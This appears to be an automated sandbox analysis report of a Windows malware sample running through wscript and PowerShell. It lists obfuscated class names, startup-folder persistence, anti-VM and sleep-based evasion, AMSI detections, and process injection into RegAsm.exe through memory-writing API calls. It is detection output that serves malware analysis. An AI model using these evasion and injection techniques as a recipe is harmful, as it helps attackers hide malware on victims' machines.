'ZdAa0PDognTctZ8IYw8qxy32aDx5SN7EpMPlfExp3mJxT9KjdqixnJg0NyvccsWDcvV3M01sonz21Wvfbggm'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, ZpzrPEZWa4qWEcgScAD5NnsFlzPm2Y9.cs High entropy of concatenated method names: 'J8i9LR7WPfUm6lW25HtbTXzahDWe8rK3sa7vLQ2sKx0fbQ564', '_8tVhzDzSvnMENa6xZNBF8DTzRwfmWBnGtf4sZelYENLEh5hGD', 'nDSUS8CZiikAT0XcFHNbtJ36kUrMYs0HQ9hW4jLocFKFFxfxS', 'qnE5uWusqQvQ7TwQuk2yvfLox4IBSWyIEdNEtzOq4fGfzjOZ9'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, EcmUVfa1L5XqkaIH6HbHkBiwj0eT9cf.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'UMCPdJLg9iSRyhqP5FvuxVkzjCVrRuyyeTIDEqd4FJjUwsod0', 'SzrlcrGfy2u2qC7Iqs28vw5W46QgvrmeOwbwZztYWZvBbRvY7', 'EZPZj8foG2zP034kJM2GoBglg1xdz0Pq8u5yuHkqBX4wdflVh', 'kAPcN0kjRmrGe6pWclWkSwmbxPQiNj5tyZ7bLTzNcyYkWgC6D'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.cs High entropy of concatenated method names: '_9B22Czp8skaw03xiR', 'hxSg8DMICskDTdoCS', 'MoemDsyMcPqZkQmFl', 'o0vipdyf1OR0ObXGC', 'UNgWlPJWKMnqjzLcC', 'oxN7UbaO4yjGdpcJ8', 'bXlppUX8DSBKrkOdu', 'dxUoO4xhcUzx8oO5J', '_8XfpFbokqCYleOWEk', 'NW8vqva4N9hXuPWGQ'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, uZaXYBDZ6KheGbUfWnzSAabcEeeKPaY.cs High entropy of concatenated method names: 'br5eXuRVodgprDprWkCH3hlNi0uAyjq', 'huGMrIY793DeOvfpUaR7E0efSazDjry', 'RdsVqV7T3SuKZEp0FRpelYIHFByhBb1', '_51hXy89Hpv2exsGmU8getVVsb6IpCQP', 'pHQarxZg3Y7dOzlBoBfai8Q9GFjrfT5PP4htnu9UgYzBAi3pQ', 'imMUI5fEHwIG5o6gCoRWHNMco0qKWmqbDJhm3pQMQOnqk8L8u', 'zbd7zSMSH9TA8ISQUMqBkYhQC3jzXAQmMSyJMHp5ossUoDW7s', '_4dhtSd1ohqWIJpgU39W8XwMoqyBHktflfxVBR5ojWOWpBGv3D', 'IfH9jiTSaG8rVzVGVL8V2H6HtyEd0NEym60n0lZjzvct0N3RD', 'XRQJ25mbptn811DUe7igV0KPzx2FDoOzCjmNLBOHQ13uVkctP'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 8ly6sYOYGHY603xNL.cs High entropy of concatenated method names: 'sLYNuXqXwrGcoibVr', 'bNKycKIBtmRtxmPs4RSl2ywEoKHqMVzgDxon8o5p0gPrzRtRlCV71qInEpOvTWheAbC', 'SB8FbkxQv2FsTOH98lOMb38jnVL1w7Mu1ikdfVSSSXlpHBXvZIvAIpFwtv3RAIYQYAG', 'bAO2WcjBwkzl7q5i22aj0t67Tcg0WiSBoRp0QkKJOZDpTru1dRbblJOZAOnEh40zixe', 'JBfwxwoHWOChqJPbCdnaiPi4roExDsqERoIiK4YyxT8VqRIdW9T6SaFyGLaP9WRG46c'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, 4Q2ibNxyBllaUbuES.cs High entropy of concatenated method names: 'hqwMgvdTj6DxGmf4z', 'ZsPuYsgyWtYvjRnlJ', 'yKhQHew7k4ctpljue', 'YjvlW8vjJsH2uipxy', 'PdgEfFB0qqQQuh6Wf', 'RqccMv1T262c0QvEh', 'aRPJytsm2eLmOdLpe', 'i3jteoSI0etjX9adc', 'wU70MvasodcIojkyZ', 'wF3KJ9B1qqB8BORea'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, md2LJQvBQNx1MN7eq.cs High entropy of concatenated method names: 'B7oHbSdkSekEZCEpe', 'rkBmSWmP8fsbiCbB8', 'XmivMOV2gPJWWW1qN', 'G6MlGij3qlLcy1gj3', '_7SGKsw3blHvncLZka', 'E4aHUO5Gp37AeSChb', '_4xgo7J0swz0RYjSo3', '_3X2jrP8IPinsurV8E', 'WA2IheLBxfG6dg0TV', 'lZ5NFpdf7RJUPYP9P'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, Hf0jRXweJYx23320j.cs High entropy of concatenated method names: '_92sGAFfeSeEOY0xu6', 'JX0Nr18GmvFpa7SKqcaScZseZm6mdUQK5p66QOl0g6Rqwj8U9pcCUXkITLCnQeyAqKt', 'J7pLtFgW2B7Ht6AwgpuqxB7EpezdukgcFx3kKRqjlpCjOzHcUpAc62NRYcP4O56YjHo', 'U9w54ISTyQUq3K51Mlqmk81AQ2JHvSQPmNKJswg4Rf0K54SYDqacwHXnXqsLNFCzH3h', 'jVigYWjUotvmqlIwSfewdgstGGArnunYFuMVYkpUEo59e5p4xzOBnmBLljTx63FIluC'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.cs High entropy of concatenated method names: 'VID28M9oZZYEM2JrUREYVz2QQT0zJ32', '_58URoK9IgBYP2nb12hCOuf6pMkyIsc5', 'BVMJMIgQWUeVzuViyxK09rU9HfDXmUz', 'd9qDZrxHmQPLwHS8KYjnUT3vdWW0rTY', 'ZS7BS6os0ql3YUQhAsMbKa7E89PZeUs', 'apAgjHd7IxfhBGZoC', 'N1W8xawn9mgdDSljN', 'oF3A0sgfCWW7RXkXV', 'miWvrTPhqtSVLdT8P', 'iSBXZTAL97lagi6Lu'
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 14A0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 3080000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 5080000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 29A0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 2B30000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 4B30000 memory reserve | memory write watch
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1314
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1739
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4657
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5159
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2893
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 2933
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 6822
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1357
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 874
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 675
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8593
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1117
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4912
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6160 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276 | Thread sleep count: 4657 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep count: 5159 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556 | Thread sleep time: -13835058055282155s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3292 | Thread sleep count: 2893 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 | Thread sleep count: 2146 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2752 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6448 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6428 | Thread sleep time: -23058430092136925s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1784 | Thread sleep count: 2933 > 30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1784 | Thread sleep count: 6822 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5136 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 874 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5960 | Thread sleep count: 675 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5228 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6556 | Thread sleep count: 8593 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6400 | Thread sleep count: 1117 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 | Thread sleep count: 31 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172 | Thread sleep time: -28592453314249787s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256 | Thread sleep count: 4912 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7312Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 30000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: powershell.exe, 00000004.00000002.2270288914.000002877C800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW9
                Source: powershell.exe, 0000000E.00000002.2594095090.00000272EE8D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: powershell.exe, 0000000E.00000002.2403141075.00000272D67E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                Source: powershell.exe, 0000000E.00000002.2596848048.00000272EEA40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                Source: RegAsm.exe, 00000007.00000002.3345509657.000000000166B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara matchFile source: amsi64_6400.amsi.csv, type: OTHER
                Source: Yara matchFile source: amsi64_7096.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesWritten)
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.ProcessHandle, num4, length, 12288, 64)
                Source: 4.2.powershell.exe.2877ca60000.5.raw.unpack, PoliTzzxo.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.ProcessHandle, num5, data, bufferSize, ref bytesWritten)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 414000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 416000
